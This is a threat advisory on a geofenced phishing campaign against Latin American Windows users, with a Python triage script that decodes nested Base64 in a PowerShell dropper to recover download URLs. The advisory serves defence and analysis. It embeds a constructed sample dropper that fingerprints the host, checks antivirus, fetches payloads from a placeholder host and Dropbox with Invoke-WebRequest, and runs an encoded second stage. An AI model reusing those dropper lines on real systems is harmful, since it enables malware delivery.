Threat Advisory

Phishing Campaign Targets Latin American Windows Users with Multi-Stage Malware Attack

Threat: Phishing Campaign
Criticality: High

EXECUTIVE SUMMARY

A recently observed phishing campaign targeting Latin America shows the lengths to which its operators go to hide malicious activity from defenders and analysis tooling. The lure emails carry a ZIP attachment containing an HTML file that, when opened, leads to the download of a malicious payload posing as an invoice.


Analysis of the email headers showed the messages originating from sender addresses that follow a single format on one domain, and sent through Roundcube Webmail, a platform frequently abused in phishing operations. The HTML file in the attachment assembles its URL from concatenated string fragments; when fetched from most locations, that URL returns only a suspended-page notice. The URL resolves to an IP address that also hosts several newly registered domains, some with ties to Mexico. When the same URL is requested from a Mexico-based IP address, it instead redirects to a CAPTCHA page and then serves a malicious RAR archive. The archive contains a PowerShell script that collects system information and checks for installed antivirus products. Base64-encoded strings in the script decode to URLs for further downloads, among them a ZIP file hosted on Dropbox that contains numerous suspicious files, including executables built from AutoIt scripts.
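The analysis step described above, recovering download URLs from Base64-encoded strings inside the PowerShell dropper, as an added Python triage example. This is not code from the advisory or from the campaign: the sample script, the placeholder host payload.example.invalid and the Dropbox path are constructed here to mimic the behaviour the advisory describes. The decoder tries both UTF-8 and UTF-16LE because PowerShell's [Convert]::FromBase64String is commonly paired with [Text.Encoding]::Unicode and with -EncodedCommand, and it recurses so that a URL hidden inside a nested encoded command is still found.

```python
"""Triage helper: recover download URLs hidden in Base64 strings inside a PowerShell dropper."""
import base64
import binascii
import re
from urllib.parse import urlsplit

# Runs of Base64 alphabet long enough to be worth decoding, with optional padding,
# bounded so that a match never starts or ends inside a longer token.
B64_RE = re.compile(r"(?<![A-Za-z0-9+/=])([A-Za-z0-9+/]{20,}={0,2})(?![A-Za-z0-9+/=])")
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)

# File-sharing hosts commonly used to stage follow-on payloads (the advisory notes Dropbox).
FILE_SHARING_HOSTS = {"dropbox.com", "www.dropbox.com", "dl.dropboxusercontent.com"}


def decode_candidates(blob: str) -> list[str]:
    """Decode one Base64 blob as UTF-8 and as UTF-16LE (PowerShell's [Text.Encoding]::Unicode),
    keeping only results that are printable ASCII, which is what a URL or nested command looks like."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return []
    results = []
    for encoding in ("utf-8", "utf-16-le"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        # A wrong-encoding guess yields control characters or non-ASCII garbage; drop it.
        if text and all(32 <= ord(ch) < 127 for ch in text):
            results.append(text)
    return results


def extract_urls(script: str, max_depth: int = 3) -> dict[str, int]:
    """Return {url: layer}, where layer 0 is plaintext and layer n is n Base64 decodings deep."""
    found: dict[str, int] = {}

    def walk(text: str, depth: int) -> None:
        for m in URL_RE.finditer(text):
            found.setdefault(m.group(0).rstrip(".,;)"), depth)  # keep the shallowest layer
        if depth >= max_depth:
            return
        for m in B64_RE.finditer(text):
            for decoded in decode_candidates(m.group(1)):
                walk(decoded, depth + 1)

    walk(script, 0)
    return found


def classify_host(url: str) -> str:
    """Label a URL 'file-sharing' when it points at a known file-hosting service, else 'other'."""
    host = (urlsplit(url).hostname or "").lower()
    if host in FILE_SHARING_HOSTS or host.endswith(".dropbox.com"):
        return "file-sharing"
    return "other"


# ---- Constructed sample (not the real dropper) -------------------------------------------
def _b64(text: str, encoding: str = "utf-8") -> str:
    return base64.b64encode(text.encode(encoding)).decode("ascii")

STAGE2_URL = "https://payload.example.invalid/stage2.rar"              # placeholder host
DROPBOX_URL = "https://www.dropbox.com/s/placeholder/invoice.zip?dl=1"  # placeholder path

# Nested stage: a UTF-8 Base64 URL wrapped inside a UTF-16LE -EncodedCommand blob.
INNER_COMMAND = (
    f'$d = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("{_b64(DROPBOX_URL)}")); '
    f'Invoke-WebRequest -Uri $d -OutFile "$env:TEMP\\update.zip"'
)

# Mimics the behaviour described in the advisory: host fingerprinting, an antivirus check via
# the SecurityCenter2 WMI namespace, a Base64 download URL, and a nested encoded second stage.
SAMPLE_SCRIPT = f"""
$os = Get-CimInstance Win32_OperatingSystem | Select-Object Caption, Version
$av = Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct
$u = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("{_b64(STAGE2_URL)}"))
Invoke-WebRequest -Uri $u -OutFile "$env:TEMP\\factura.rar"
powershell.exe -NoProfile -EncodedCommand {_b64(INNER_COMMAND, "utf-16-le")}
"""

if __name__ == "__main__":
    for url, layer in sorted(extract_urls(SAMPLE_SCRIPT).items(), key=lambda kv: kv[1]):
        print(f"layer {layer}  {classify_host(url):13s} {url}")
```

Run it against the script extracted from the RAR archive rather than against the live URL: the geofenced CAPTCHA stage cannot be reproduced from outside the targeted region, so the dropper itself is the artifact that yields the follow-on infrastructure. The layer number shows how many decoding passes each URL was hidden behind, which is useful when writing detections for the obfuscation rather than for individual hosts.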

The campaign combines several evasion techniques: newly registered domains with no reputation history, geolocation-based redirection that shows out-of-region analysts and sandboxes only a suspended page, and obfuscated code in both the attachment and the dropper. Together these are intended to slip past automated controls and reach the intended victims. Recipients should treat unexpected attachments and links, particularly those posing as invoices, with caution, since opening them can trigger a multi-stage malware installation. Defenders should also assume that URL scanning performed from outside the targeted region will not reproduce the malicious behavior, and weight their verdicts accordingly.

THREAT PROFILE:

REFERENCES:

The following reports contain further technical details:

https://thehackernews.com/2024/04/cybercriminals-targeting-latin-america.html
